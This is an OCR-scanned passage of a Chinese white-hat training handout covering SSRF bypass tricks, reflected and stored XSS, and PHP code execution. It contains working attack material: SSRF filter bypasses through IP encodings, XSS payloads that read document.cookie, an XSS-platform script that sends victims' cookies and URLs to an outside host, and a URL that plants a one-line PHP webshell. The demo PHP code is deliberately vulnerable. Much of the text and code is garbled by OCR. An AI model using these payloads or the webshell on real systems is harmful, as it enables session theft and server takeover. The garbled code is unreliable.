址 。 ?在 此 例子 中 ， 首先 我 们 要 获取 内 网 存在 HTTP 服 务 且 存在 favicon.ico 文 件 的 地 
址 ， 才 能 验证 是 否 是 SSRF 漏 洞 。 


找 存 在 HTTP 服 务 的 内 网 地 址 : 
一 、 从 漏洞 平台 中 的 历史 漏洞 寻找 泄漏 的 存在 web 应 用 内 网 地 址 
二 、 通 过 二 级 域名 暴力 猜 解 工具 模糊 猜测 内 网 地 址 


ChendeMacBook-Pro:- Maih$ ping Gj. 和 com.cn 
PING gS. sème. com.cn (18.215.28.9): 56 data bytes 


example:ping Xxx.xx.com.cn 


可 以 推测 10.215.x.x 此 段 就 有 很 大 的 可 
能 : http://10.215.x.x/favicon.ico PÆ ° 


再 举 一 个 特殊 的 例子 来 说 明 : 


http://fanyi.baidu.com/transpage?queryzhttp: //www.baidu.com/s?wd 
-i1p&source-url&ie-utf8&from-auto&to-zh&render-1 


此 处 得 到 的 IP 不 是 我 所 在 地 址 使 用 的 |P， 因 此 可 以 判断 此 处 是 由 服务 器 发 起 

的 http://www.baidu.com/s?wd-ip 请 求 得 到 的 地 址 ， 目 然 是 内 部 逻辑 中 发 起 请 

求 的 服务 器 的 外 网 地 址 (为 什么 这 么 说 呢 ， 因 为 发 起 的 请 求 的 不 一 RE 

- baidu.com ， 而 是 内 部 其 他 服务 器 ) ,那么 此 处 是 不 是 SSRF， 能 形成 危害 吗 ? 
严格 来 说 此 处 是 SSRF， 但 是 百度 已 经 做 过 过 了 过 滤 处 理 ， 因 此 形 成 不 了 探测 内 网 的 


fe, o 
防御 


1. 过滤 返回 信息 ， et sh ， 是 比较 容易 的 方法 。 如 果 Web 
应 用 获取 杀 种 类 型 的 文件 ， 那 么 可 以 在 把 返回 结果 展示 给 用 户 之 前 先 验 证 返回 
信息 是 否 符 合 标 准 。 


2j 一 错误 信息 TON > ibe R P AR dE 4 昔 误 信息 AS 来 判 ET 远程 服务 2S 3m 口 状 太 © 
限制 请 求 的 端口 为 HTTP 常用 端口 ， 比 如 80、443、8080、8090 。 
黑 名 单 内 网 PP， 避 更 应 用 被 用 来 获取 内 网 数据 ， 攻 击 内 网 。 


禁用 不 需要 的 协议 。 仅 仅 允许 HTTP 和 HTTPS 请 求 。 可 以 防止 类 似 
于 file:// ^ gopher:// 和 ftp:// 等 引起 的 问题 。 


A xe N 


Zt id 
URL 


http://username: password@www. xxx.com: 80/ 


| | | | | 
协议 MPZ uU 主机 m T 


所 以 我 们 就 可 以 使 用 这 个 格式 来 绕 过 : 


http://www. baidu. com@www.qq.com/ 


IP 转换 

转 为 数字 : 
127.0.0.1 

转 为 十 六 进 制 : 


Ox/F.0x00.0x00.0x01 
Ox/F000001 


转 为 八进制 ; 


0177.0000.0000 .0001 


C:\Users\asus\Desktop> ping Ox7F.0x00.0x00.0x01 


正在 Ping 127.0.0.1 具有 32 字 节 的 数据 : 


KH 127.0.0.1 的 回复 : 字 节 =32 时 间 <1ms TTL-128 
KH 127.0.0.1 的 回复 : 字 节 =32 时 间 <1ms TTL-128 
KH 127.0.0.1 的 回复 : FP=32 时 间 <1ms TTL-128 
KH 127.0.0.1 的 回复 : FP=32 时 间 <1ms TTL=128 


127.0.0.1 的 Ping 统计 信息 : 


数据 包 : 已 发 送 = 4° 已 接收 = 4° EX 


往返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ): 
最 短 = Oms? KK = Oms， 平 均 


= 9 (0% 丢失 )， 


C:\Users\asus\Desktop> ping Ox7F000001 


正在 Ping 127.0.0.1 具有 32 T $9 XE: 


KH 127.0.0.1 的 回复 : FP=32 时 间 <1ms TTL-128 
KH 127.0.0.1 的 回复 : FP=32 时 间 <1ms TTL-128 
KH 127.0.0.1 的 回复 : FP=32 时 间 <1ms TTL-128 
KH 127.0.0.1 的 回复 : FP=32 时 间 <1ms TTL=128 


127.0.0.1 的 Ping 统计 信息 : 


数据 包 已 发 送 = 4， 已 接收 = 45 £X = 0 (0% £X)» 


往返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ): 
最 短 = Oms? KK = 0ms， 平 均 


C:NUsersNasusNDesktop» ping 0177.0000.0000.0001 


正在 Ping 127.0.0.1 具有 32 字 节 的 数据 ， 
KH 127.0.0.1 的 回复 : 字 节 =32 时 间 <1ms 
KH 127.0.0.1 NHR: 字 节 =32 时 间 <1ms 
KH 127.0.0.1 NHR: 字 节 =32 时 间 <1ms 
KH 127.0.0.1 NHR: 字 节 =32 时 间 <1ms 


127.0.0.1 的 Ping 统计 信息 : 


数据 包 : 已 发 送 = 4° 已 接收 = 4° ER 


往返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ): 
最 短 = Oms? KK = Oms， 平 均 


URL 跳 转 


TTL=128 
TTL=128 
TTL=128 
TTL=128 


= 0 (0% £X)» 


<?php header( "Location: $ GET['url']"); ?> 


保存 为 urllocation.php 然后 部 署 ， 之 后 可 以 
用 http://«host»/urllocation.php?url-«url» 来 跳 转 。 


短 网 址 


百度 : http://dwz.cn/ 


xip.io 


gg gg 
; 99; /gg 9g gg, 9990, gg ; 99999, 
""8b,dP" 88 ISP"  "Yb 88 dP" "Y8ggg 
, 88" 88 I8' , 91 88 18' , 9I 
,dP"Y8,  ,88, ,I8 3 ,d8' d8b _,88,_,d8, , d8' 
dP" "Y888P""Y8PI8 YY88888P Y8P 8P""Y8P"Y8888P" 
I8 
I8 wildcard DNS for everyone 


What is xip.io? 

Xip.io is a magic domain name that provides wildcard DNS 
for any IP address. Say your LAN IP address is 10.0.0.1. 
Using xip.1io, 


10.0.0.1.xip.io resolves to 10.0.0.1 
www.10.0.0.1.xip.io resolves to 10.0.0.1 
mysite.10.0.0.1.xip.io resolves to 10.0.0.1 
foo.bar.10.0.0.1.xip.io resolves to 10.0.0.1 


...and so on. You can use these domains to access virtual 
hosts on your development web server from devices on your 
local network, like iPads, iPhones, and other computers. 
No configuration required! 


How does it work? 

xip.io runs a custom DNS server on the public Internet. 
When your computer looks up a xip.io domain, the xip.io 
DNS server extracts the IP address from the domain and 

sends it back in the response. 


Does xip.io cost anything? 

Nope! xip.io is a free service from Basecamp, the 
creators of Pow. We were tired of jumping through hoops 
to test our apps on other devices and decided to solve 
the problem once and for all. 


O 2012-2014 Sam Stephenson, Basecamp 
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RPT AF GB PAIS VI SL 漏洞 篇 XSS 


讲师 : ghOstkey 
整理 : 飞龙 
协议 : CC BY-NC-SA 4.0 


跨 站 脚本 攻击 (Cross Site Scripting) ， 为 不 和 层 且 样式 表 (Cascading Style 
Sheets : CSS) 的 缩写 混淆 ， 故 将 跨 站 脚本 攻击 缩写 为 XSS 。 和 恶意 攻击 者 往 Web 
页 面 里 插入 恶意 "d io SAPARAN > RA Web 页 面 里 的 代 
码 会 被 执行 ， 从 而 达到 恶意 攻击 用 户 的 目的 。 


上 的 网 页 显示 : 








Payload 


Payload i T 3t 3L UR RR? Æ XSS 中 指 代 攻击 代码 或 攻击 语 钉 。 
常见 的 Payload 有 : 


e 正常 弹 窗 
o <script>alert(1)</script> 
o <img src=0 onerror=alert(1)> 
e 弹出 网 站 Cookie 
o <script>alert(document.cookie)</script> 
o <img src=0 onerror=alert(document.cookie)> 


分 类 


n 


总 共有 三 种 
e 反射 型 : Payload 经 过 后 端 ， 不 经 过 数据 库 
e 存储 型 : Payload 经 过 后 端 ， 经 过 数据 库 
e DOM: Payload 不 经 过 后 端 


原理 : 反射 型 


非 持久 化 ， 需 要 欺骗 用 户 点 击 链接 才能 触发 XSS 代码 (数据 库 中 没有 这 样 的 页 面 
fe €) 。Payload 一 般 存在 于 URL 或 者 HTTP 正文 中 ， 需 要 构造 页 面 ， 或 者 构 
i URL ° 


将 这 段 代码 保生 为 xss.php 。 


«?php 

header( 'X-XSS-Protection: 0'); 
?> 

<p> 有 反射 型 XSS 演示 </p> 

«form action-"" method="get"> 


<input type="text" name="xss"/> 
<input type="submit" value="test"/> 
</form> 


<?php 

$xss = Q$ GET['xss']; 

if ($xss!==null){ 
echo $xss; 

} 


我 们 看 到 ， 这 段 代码 中 首先 包含 一 个 表单 ， 用 于 向 页 面 自己 发 送 GET 请 求 ， 带 一 
个 名 为 xss 的 参数 。 然后 PHP es > oR KAS > M BEAT ep RR > 
ede à Y RJ AE DUE o MeL 4. xss 中 存在 HTML 结构 性 的 内 

> 打印 之 后 会 直接 解释 为 HTML 元 素 。 


我 们 部 署 好 这 个 文件 ， 访 问 http://localhost/xss.php ， 如 图 : 





m localhost 上 localhost jr 4 存 情 中 3 演示 x http: //localhaort/exzzresz. php X XSSE RITE. 





INT "| = ¢ SQL NSSr Encryption: Encoding: Others 


fa) Load URL 
Ü Split URL 
b Execute 


[ Enable Fost data [| Enable Referrer 


ASSE BBC 


test 


漏洞 篇 XSS 


我 们 直接 输入 一 个 HTML 代码 ， 比 如 <script>alert(1)</script> ， 之 后 点 
击 test 





B m —É— [e 
-gg xj|asrecco E E m ARES 















“[ Enable Post date [^ Ensble Referrer 





w— 弹 窗 ， 也 就 是 我 们 输入 的 HTML 代码 被 执行 了 。 


后 我 们 查看 元 素 ， 这 表明 ， 我 们 输出 的 内 容 直 接 插 入 到 了 页 面 中 ， 解 释 
为 «script» 标签 。 


R > 控制 台 ORES { } 样式 编辑 器 Oti 三 网 络 
html |^ body QO D| 
<html> 
b <head> <head> 
w <body> 
ASS 反射 演示 
w <form actionz"" method="zget*> 
<input name=“xss" type="text”></input> 
<input value="test” typ it*></input> 
</form> 





</body> 
<fhtml> 


我 们 可 以 自 定 义 弹 窗 中 的 内 容 来 利用 XSS， 比 如 改 


成 alert(document.cookie) 。 


这 个 例子 中 URL 
为 http://localhost/xss. php?xss=%3Cscript%3Ealert%281%29%3C%2FScript? 
> 这 个 URL 容易 引起 怀疑 ， 可 以 使 用 短 网 址 工具 缩短 后 发 送 给 受害 者 。 


at ， 我 们 可 以 看 出 ， 反 射 型 XSS 的 数据 流向 是 BIB -> 后 端 -> 


H) 9 


原理 : 存储 型 
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持久 化 ， 代 码 储 存在 数据 库 中 。 如 在 个 人 信息 或 发 表 文 章 等 地 方 ， 假 如 代码 ， 如 果 
没有 过 滤 ik 不 严 ， 那 么 这 些 代 码 将 储存 到 数据 库 中 ， 用 户 访问 该 页 面 的 时 候 出 
发 代码 执行 。 这 种 XSS HREM > BAIE MIE » EH Cookie 等 。 


这 里 我 们 把 xss.php 内 容 改 为 (同时 数据 库 中 需要 配置 相应 的 衣 ) 


<?php 
header('X-XSS-Protection: 0'); 
2» 

<P> fia # XSS 演示 </p> 

«form action="" method="post"> 


<input type="text" name="xss"/> 
<input type="submit" value="test"/> 
</form> 
<?php 
$xss-Q$ POST['xss']; 
mysql connect("localhost","root","root"); 
mysql select db("'"xss"); 
if($xss!--null)( 
$sql="insert into test(id,payload) values('1',$xss)'; 
$result-mysql query($sql); 
echo $result; 


可 以 看 到 ， 用 户 输入 的 内 容 还 是 没有 过 滤 ， 但 是 不 直接 显示 在 页 面 中 ， 而 是 插入 到 
了 数据 库 。 


我 们 新 建 res.php ， 内 容 为 : 


mysql connect("localhost","root","root"); 

mysql select db("'"xss"); 

$sql="Select payload from test where id-1"; 

$result-mysql query($sql); 

while($row-mysql fetch array($result))( 
echo $row['payload']; 

} 


该 代码 从 数据 库 读 取 了 之 前 插入 的 内 容 ， 并 将 其 显示 出 来 。 
我 们 部 署 之 后 首先 查看 test 数据 库 ， 确 认 它 是 空 的 : 


漏洞 篇 XSS 









其 


Iur — m c @ SQLr XSS- Encryption Encodings Üther- 
ye) Load URL x 
Ü Split URL | i 
^; Execute 
[| Enable Post data J” Enable Referrer 
cf] localhost » 





| 国 浏览 ce 48 Lf) SQL 4 -搜索 # 插入 BSH BSA A RFE % MEF 
2 HE B&B 9 


HE 
[- 


显示 行 0 - 1 (2 总 计 ， 查 询 花费 0.0000 $5) 














S 
ES ; SELECT * 
| (最 近 使 用 的 表 ) ..— || PROM test 
[xs x| LIMIT 0 , 30 
司 test p 性 能 分 析 [快速 编辑 ] [ 编辑 ] [ 解析 SQL ] [ 创建 PHP 代码 ] [ 刷新 ] 
Q s XE SR: íT: (0 | 行 数 : 30 每 | 100 | TERRA 
| + 选项 
-T> " id payload 
[ 多 编辑 xc 复制 QNO 1 





[ JRE g Eh mo 1 


Sm: dei: o | aa: |30 | 每 |100 | 行 重复 表 头 





—UmWARRX | 


O 打印 预览 O 打印 预览 (GED 图 导出 ga 显示 图 表 E 新 建 视图 








然后 访问 xss.php ， 像 之 前 一 样 输入 HTML 代码 并 点 击 test ， 如 下 : 


"m localhost fi localhost fv x 存储 X35 演示 


| ht tp: ffl acalhao:-- tr HES 





D localhost/subjsct/cxzsz.php 
[rm c] = 9 SQL- XSS- Eneryptiony Encoding 0therr 
un] Load URL 
jb Split URL 
LkJ "Exe cute 


[| Enable Post data [ Enable Referrer 


EKSS ENR 
cript> — test | 






-ecript»-alert 


点 击 之 后 却 发 现 没 有 任何 动静 ， 但 事实 上 ， 我 们 的 数据 已 经 插入 到 了 数据 库 中 。 
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漏洞 篇 XSS 








me eH Osa ARF FHA BSH ESA LF RE c MER 





D 性 能 分 析 [快速 编辑 ] [ 编辑 ] [ 解析 SQL ] [ 创建 PHP 代码 ] [ 刷新 ] 


+ 选项 

-T> " id payload 

[ 4^ RE xe 复制 © 删除 0 1 

[ 4 编辑 3c RS! Q NERO 1 | 
[ 4 RE xe 复制 @ 删除 1 ‘<script alert (1) /script> 


t 全 选 / 全 不 选 oe. P d —Q m ESE 





SUR: tet: o | 行 数 : |30 | 每 |100 | 行 重复 表 头 





一 | 查询 结果 选项 | 


B 打印 预览 (y 打印 预览 (CED) uu 导出 ga 显示 图 表 E 新 建议 图 





那么 ， 当 我 们 访问 res.php 查询 这 个 值 的 时 候 ， 代 码 就 会 被 执行 


WB localhost / localhost / X | 存 铺 XSs 演 示 E D) 正在 连接 … x XSS 反 射 演 示 x | 十 














© Encryption Encodings Other — E 
@ lai E 
& ‘Split URL + 
>) Execute 


[^ Enable Post data [~ Enable Referrer 








B xci > AAA XSS 的 执 和 了 位 
XSS 的 数据 流向 是 : 浏览 器 -> 


通 第 不 同 于 输入 位 置 an | 75 EAT 
端 -> 数据 库 -> 后 端 -> 浏览 器 


置 
后 


利用 


我 们 可 能 需要 通过 XSS 来 获得 用 户 Cookie 或 其 他 有 用 信息 ， 利 用 平台 负责 接收 并 
保存 这 些 信 息 。 另外 ， 利用 平台 能 够 托管 利用 脚本 ， 于 是 我 们 可 以 向 页 面 只 注入 一 
个 脚本 链接 ， 使 长 度 极 大 缩短 。 
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这 里 的 XSS 利用 平台 使 用 xsserme， 大 家 可 以 自行 下 载 和 搭建 。 


e 下 载 : http://download.csdn.net/detail/gzliu_hit/5606811 
e 搭建 : http://blog.csdn.net/god_7z1/article/details/47234989 


首先 访问 主页 ， 你 会 看 到 一 个 登录 页 面 ， 输 入 用 户 名 和 密码 之 后 点 击 "登录 ” : 


米 斯 特 安全 团队 XSS 平 台 


登录 
HAPS 


rootkit 


密码 


Ri 还 没有 账号 ? 立刻 注册 


成 功 之 后 会 显示 主 界面 ， 左 边 是 模块 列表 ， 右 边 是 项 目 列表 : 


YK 斯 H TE a Zi BXSS-^E e FAP: rootkit, CARE Eus 退出 


ai ose RØRE aema 
Xss 截 屏 项 目 名 称 TR Hinh ABR 创建 时 间 操作 
Xss 截 屏 test 1 2016-06-10 删除 

我 的 模块 创建 aaa aaa 0 2016-05-29 删除 


Emloqg CSRF Add 
AdminUser 


公共 模块 


基础 认证 钓鱼 
xss js 


我 们 点 击 左 边 “ 我 的 项 目 " 穷 边 的 "创建 "按钮 : 


当前 位 站 ; EDD 创建 项 目 


ez Tn A 


Ja H zs 





Ti H HE 
c | HeH | 


名 称 和 描述 可 以 随便 取 ， 不 影响 使 用 。 输 入 时 候 点 击 “ 下 一 步 " 按 钮 。 之 后 会 出 现 “ 配 
置 代 码 ? 春 面 : 


Batis 


RHA 
米 斯 特 培训 实验 


e [默认 模块 展开 

e [| xssjs 展开 

e 『「 ”基础 认证 物 鱼 展开 

[^ Emlog CSRF Add AdminUser EXE e 
C 获 职 保存 的 明 立 密码 展开 


e | ssm EF 


iv 自 定义 代码 


下 一 步 RC 


我 们 只 选择 默认 模块 ， 把 它 展 开 之 后 ， 我 们 可 以 看 到 它 的 作用 是 向 平台 发 送 一 个 请 
求 ， 来 收集 用 户 的 各 种 信息 。 之 后 点 击 " 下 一 步 "。 


e [| 默认 模块 DE 


而 要 有 站 的 条 水 

(* 无 Kee gion (^ keepsession 
mer 
location toplocation cookie, opener 
代码 : 


munctianiinew mage sre= httpixss.hi-aurlifa.cam/index php'?da-api&id-fprajectld&lacatianz-escapermfunctian) 
fin return dacument.lacatian.hreficatehieMretum "op etoplocation="tescapettunctono{tra return 
tap.lacation.hreficateh(eMretum "hon &coakie- *escapermfunctiantdtrvretum document.cookie}catchtel return 
""nmg-&aopenerz-escaperfunctiongdftrreturn dvindow opener && 

window openerlocation.hren?window opener location hret"eatchiereturn "ho ho, ttt setkeepsession}==1) 
{keep=new Imagen keep.src- httpxss.hi-aurlife.cam/index php?da-keepsessian&id-Iprajectld 14 
Url="+tescapefdocumentlocationi+ &cookia='tescapefdocumentcookiei} 


然后 我 们 会 在 首页 看 到 我 们 的 新 项 目 ， 上 点击 这 个 项 目 : 





创建 我 的 项 目 创建 项 目 
米 斯 WAAR 项 目 描述 AB 创建 时 间 操作 
米 斯 特 培训 实验 米 斯 特 培训 实验 0 2016-07-05 HES 
ES Xss 截 屏 test 1 2016-06-10 HIBS: 
我 的 模块 创建 aaa aaa 0 2016-05-29 ARIES 


之 后 点 击 右 上 方 的 查看 代码 ， 就 可 以 看 到 使 用 方法 : 


Ja AACS : 


CFunctian()Itnew Image(3].srcse' http://"xss.h1-ourlife.com/,"1ndex.php?doszapi&i d= zes 
locatians'crescape((function()Ttryireturn document.location.hreflicatch(e)TIreturn 

LO &toplocation='+escapel(function(jftryfreturn toap.locatian.hreficatch(e)Ireturn 

REI E+ &cookies2' -escape((functioan()itrylireturn document. cookiebcatchfejyfreturn 

LRQ &openerz2'crescapet((function()Titryireturn (window.opener && 
w1ndow.opener.location.hrefj)"window.opener.location.href:''Tcatch(eod4return REDE 2005 AFG ' 2212 
{keep=new Image): keep.srec=' http:/,/xss.h1-ourlife.com/,"1ndex.php?dazkeepsessioné& d2M rz ce 
uUrl='+escapefdocument,. locationj+ ' &@cookie='+escapefdocument. cookie) +; 


mig Al : 
Tes P ELA. PSE Els SROERCS OEA RIPO o 即 可 在 IB PIS MASSAR 


e"textarea»'"»escript srcehttp:,///"xss.h1-ourlife. om 2B» ¢/5cripts 


或 者 


g textarea ' "»«1mg src-x id=xssyou stylesdisplay:none 

oanerrorzewval(unescape(,^var&2z0bg3Ddocument.createEl ement&28€E22scr1pte22x20953Bb. srcx3DxE22httpx3 ASF 
&SaFxss.h1-ourlife.cone2FS2FMYzcXvxX3FE22*S2BMath.randanmi28929253Bx*28dacument.qgetElementsByTagMames28xa 2HEAD 
2282935 BOSS OSE CHC document. bodys29. appendCh1 | de 28bx29*3B,/. source); fs 


HRE ETERA Sa ^. 


Http://"xss.h1-aurlife.com//Mrzcxv?14d67719328 








FH ESI 


ARE eee BB dil ^. 


escript srcahttp://t. cn RS 3hePT> e/script» 


Taste eee (oS RAA da, ^. 


escript src=>¢-scripts 


Fast EL FETU SERT ds ^. 


ejmg srcex anerrorssscreateElementí('script'J:bady.appendchild(s):s.srcs 你 的 js 地 址 ;> 


简单 来 说 ， MyzcXv?1467719328 就 是 平台 所 生成 的 脚本 地 址 ， 你 可 以 把 它 放 
在 script 或 者 img 标签 的 src 属性 中 ， 在 把 标签 插入 存在 XSS 漏洞 的 地 方 ， 
然后 浏览 器 就 会 执行 。 


下 面 我 们 点 击 之 前 创建 的 aaa 项 目 。 


漏洞 篇 XSS 


ME) gee) BO) 





s] localhost / localhost 六 TFBXSSIBUT. X | http: //localho-=t/exssres. php X LSSR IHAT 米 斯 特 安全 团队 XSS 平 台 









(i) | xss. hi-ourlife. com//index. php?do-project&act-viewcode&id-13 g ER EI c Q BE «CtrlH Ww | & JB 会 + B ü |* [2 B 三 


INT yj = $9 SQL-  XSS- Encryption: Encoding: Other” 





[ Enable Post data | Enable Referrer 












FBP: rootkit, 个 人 设置 Sā 退出 


当前 位 置 : 首页 > 项 目 代码 


我 的 项 目 创建 
Xss 堆 项 目 名 称 : aaa 
aaa 
我 的 模块 创建 QARB: 
Xss (function()[(new Image(}).src='http://xss.hi-ourlife. com//index. php?do=api&i d=mSBaceé 
获取 保存 的 明 立 密码 location='+escape((function(){try{return document.location.href)catch(e)[return 
Emlog CSRF Add '""M20)-*' S&toplocation='+escape((function(){try{return top.location.href]catch(e) return 
AdminUser ''h4)0)4+' Scookie='+escape((function(){tryf{return document. cookie}catch(e){return 
公共 模块 "'}3)0)+' Sopener='+escape((function(){tryf{return (window.opener && 
iA] 8 window.opener.location.href)?window.opener.location.href:'')catch(e) [return "pO; pO; ifC''==1) 
| xss.js {keep=new Image(Q);keep.src='http://xss.hi-ourlife. com//index. php?do=keepsessioné&i d2mSBaCe& 
| 默认 模块 urlz'cescape(document.location)-'&cookie- '-escape(document.cookie)]; 
| 如 何 使 用 : 


将 如 下 代码 植 人 怀疑 出 现 Xss 的 地 方 〈 注意 的 转 灸 》, 即 可 在 项 目 内 容 观看 XS5 效 果 。 
«/textarea»'"»«script src=http://xss.hi-ourlife. on </script> 
或 者 
«/textarea»'"»«img src=# id=xssyou style=display :none 
onerror=eval (unescape(/var%20b%3Ddocument. createE] ement®28%22scri pt®22%29%3 Bb. sr c&3D€22Hhttp$3 AS2F 


%2Fxss.hi-ourlife. comé2F%2FmSBac e%3 F¥22%2BMath. random é28%29%3 B¥28document. getE] ementsBy TagName%28%22HEAD 
%22%29%5 BO&5DX;7 C37 Cdocument. body%29. appendchi 1 d&28b$29€3B/. source)2; //» 


| 再 或 者 以 你 任何 想 要 的 方式 质 入 
| http://xss.hi-ourlife.com//mSsBaCe?1467638277 


有 


N 


我 们 把 «script src="..."></script> 注入 到 反射 型 XSS 的 演示 页 面 中 。 


s 







m localhost y, localhost ftt x Fe eect = fea x http: //localhart/exzzresz. php x B 55 Fe Aiea 









localhost; subject/fxss. php?xg cript sre-http://xssz.hi-eurlife. com///mSBaCe7145TB382TT24/seript^ 


INT — T] = e SQ. ss Eneryptiony Encodings Other? 
ye) Lead URL 
A Split URL 


+) Execute 


「 Enable Fost data E Enable Referrer 


ARSS SHE 
test 


提交 之 后 页 面 没 什么 动静 ， 但 是 我 们 查看 利用 平台 ， 可 以 发 现 新 增 了 一 条 数据 : 
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斯 特 安 


当前 位 置 : BM > 项 目 内 容 


AUWAXSS E 


FAP: rootkit, 个 人 设置 Hj 退出 


K mH 创建 
— 项 目 名 称 : aaa aes 
我 的 模块 创建 
wes 截屏 Domain: 全 部 ~| 
XREETTÉISH EA 接口 地 址 ; http ikss hi-aurlife.com/da/auth/b3fl 35e63da6c2b955a2e2a0d5281249 (hg idomaindex MEd epee) attt 
Emlog CSRF Add AdminuUser 
pages na . «i Wie ERAZ Request Headers t 
xss.|s D -FĀ 2016-07-04 * location : httpMlocalhostsubjectiss. ph ® HTTP_REFERER :Hhttplocalhastisubje Hë 
默认 模块 213817 p?xss-'63Cscript 20srce-httpJics s. hi-o ctifkss php ?xss=% 3C scripts 20src-http: 
urlife.cami/lmSBaCe?14576538277963E fixes hi-ourlite.commSbaCe?1 467638 
oe 3ciscriptSs 3E 2T MSE MIC ScripthsE 
è toplocation : httpllacalhastisubjectifsss. ® HTTP_USER_AGENT : Mozillafs.0 dwind 
php?xss- Ww 3Cscript9?e 20src-httpxs s.h ows NT 5.1; nz47.0) Geckar20100101 Fi 
i-aurlife.cam//meSBaCe?145753827 7953 refaxi4 7.0 
E®3Cifscript% 3bE ® REMOTE ADDR:103.207.231.62 
® cookie: 
* opener: 
三 ”+ 展开 2018-05-29 * |ocation :httpiisoccer.sports.sohy.com! * HTTP REFERER :httpJ/soccersports.s MEE 
12:17:04 
选中 项 操作 : MES 


MY 3k 


e XSS TRANG 

HTML5 44 g 5 X 

e 新 于 指南 : DVWA-1.94 
那些 年 我 们 一 起 学 XSS 


别 教程 之 XSS 


米 斯 特 白 帽 培训 讲义 漏洞 篇 代码 执行 


讲师 : ghOstkey 
整理 : 飞龙 
协议 : CC BY-NC-SA 4.0 


原理 


由 于 开发 人 员 编 写 源 码 时 ， 没 有 针对 代码 中 可 执行 的 特殊 函数 入 口 做 过 滤 ， 导 致 客 
户 端 可 以 提交 恶意 构造 语句 ， 并 交 由 服务 端 执行 。 命 令 注入 攻击 中 ，Web 服务 器 没 
有 过 滤 类 似 system ^ eval 和 exec 等 函数 ， 是 该 漏洞 攻击 成 功 的 主要 原因 。 


实例 代码 


<?php 

// code-exe.php: 

$code=@$_GET[ 'code'];//http://localhost/subject/code-exe.php?cod 
e= 

echo "<center>Payload:".$code."<br/>Result:</center> 
eval($code); 


整个 代码 就 三 行 ， 第 一 行 用 于 从 URL 参数 中 读 取 code 参数 的 值 。 第 二 行 用 于 输 
出 该 参数 的 值 ， 用 于 检查 该 参数 。 第 三 行 直 接 将 该 参数 当做 PHP 代码 执行 。 由 于 
不 存在 任何 过 滤 ， 就 会 产生 代码 执行 漏洞 。 


我 们 在 该 文件 的 目录 下 执行 php -S 0.0.0.0:80 ， 之 后 访 
l=] http://localhost/code-exe.php?code-phpinfo(); ， 我 们 可 以 看 到 该 代码 
执行 了 phpinfo Wa: 





phpinfo () x 




















€ ) i) localhost/subject/code-exe. php?code-phpinfo(); g Em e A BE ult T & A 会 t X H 一 图 we i+ = 
s 最 常 访问 O SERMESRRT-- O 国家 信息 安全 漏洞 共 … @ easypanel - 用 户 网 … EC 漏洞 良 行 (8UGBANK) … Cy 补 天 - 企业 和 白 帽 子 … 

INT -] œ @ SQL* XSS- Encryption: Encoding: Other~ 

图 Load URL http: //localhost/subject/code-exe. php 

ah ; ?code=phpinfo (); 

jj Split URL 

> Execute 


[ Enable Post data [ Enable Referrer 





Gy 当前 网 页 的 语言 为 英 立 ， 是 否 需 要 部 译 为 中 立 ? oa EEE 选项 ~ > 








Payload:phpinfo(); 
esult: 


PHP Version 5.3.29 


pu Windows NT PC201606242004 5.1 build 2600 (Windows XP Professional Service Pack 
3) i586 


Build Date Aug 15 2014 19:15:47 
MSVC9 (Visual C++ 2008) 


sable-isapi" 
ut-pd sql” "--without- 
php- 
sdk\oracle\instantclientl1\sdk, shared" "--enable-object-out-dir-../ 2 
"--enable-com-dotnet-shared" "--with-merypt-static" “--disable-s 





利用 


我 们 可 以 将 URL 中 code 参数 值 换 成 不 同 的 PHP 代码 ， 使 其 执行 不 同 的 PHP AR 
码 。 利 用 此 漏洞 的 关键 还 是 熟悉 所 有 可 用 的 PHP 代码 。 

比如 ， 可 以 使 用 phpinfo 或 者 echo 年 调试 函数 来 判定 漏洞 。 最 重要 的 是 ， 可 以 
利用 过 个 漏洞 写 入 Webshell， 代 码 如 下 : 


$file-'mst.php'; // 一 名 话 木 马 的 文件 名 

$person='<?php @eval($_POST[1]);?>'; // 一 处 话 文 件 名 的 代码 

file put contents($file,$person, FILE APPEND | LOCK EX); // ke 
y .php 文 件 不 存在 会 自动 创建 ， 如 果 存 在 就 会 添加 


我 们 需要 把 这 三 行 代 码 写 入 URL 中 ， 得 到 的 URL 是 这 
样 : http://localhost/code-exe.php?code=$file='mst.php';$person='<?pt 


访问 之 后 ， 当 前 目录 就 会 乡 出 一 个 mst.php ， 内 容 

为 <?php Qeval($ POST[1]);?» ， 这 个 就 是 一 句 话 森马。 由 于 不 是 讲 工 具 的 章 
节 ， 这 里 就 不 拿 菜刀 演示 了 。 

在 实际 代码 中 ， 当 然 不 可 能 这 么 短 ， 就 需要 大 家 使 用 eval 和 exec 作为 关键 词 
来 搜索 可 能 的 漏洞 点 。 另 外 ， 实 际 代码 中 还 可 能 在 执行 之 前 对 $code 进行 过 滤 ， 
也 需要 大 家 发 挥 创造 性 ， 绕 过 过 滤 来 成 功利 用 它 。 


MY 3K 


漏洞 篇 代码 执行 


e 新 手指 南 : DVWA-1.9 全 级 别 教程 之 Command Injection 
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米 斯 特 白 帼 培训 讲义 漏洞 篇 第 三 方 风险 


讲师 : ghOstkey 
整理 : 飞龙 
协议 : CC BY-NC-SA 4.0 


域名 商 


RA T] SUC AED 供 域名 购买 的 站 点 。 我 们 可 以 通过 站 长 工具 的 WHOIS 查询 来 查询 域 
名 商 ， 比 如 这 里 我 们 查询 www.hi-ourlife.com 的 域名 商 : ” 


域名 hi-ourlife.com 的 信息 BIES 


hi-ourlife.com [whois R=] 


其 他 常用 域名 后 组 查询 : cn com cc net org 


注册 商 HICHINA ZHICHENG TECHNOLOGY LTD 


联系 人 modify modify [whoisk =] 
联系 方式 627437686@qq.com [whoiskz €] 
更 新 时 间 2016 年 05 月 07 日 
创建 时 间 2015 年 09 月 03 日 


过 期 时 TBj 2017 年 09 月 03 日 


公司 ma yun | 
Pes BESSER grs-whois.hichina.com 
DNS f1ginsl.dnspod.net 


flgins2.dnspod.net 


状态 域名 普通 状态 (okK) 


我 们 可 以 得 知 ， 该 域名 是 在 万 网 注册 的 。 


域名 商 存 在 一 些 安全 隐患 ， 比 如 域名 商 网 站 包含 一 套用 户 系 统 ， 其 找 回响 码 功 能 5 
ALGER BSS Ba) 〈 见 "逻辑 漏洞 "一 节 ) 。 找 回答 码 之 后 ， 和 恶意 用 尸 就 可 以 
登录 并 动 持 账户 上 的 所 有 域名 。 


再 者 ， 域 名 商 站 点 中 包含 用 于 管理 域名 的 后 全 页 面 。 许 多 后 台 把 被 管理 的 域名 放 在 
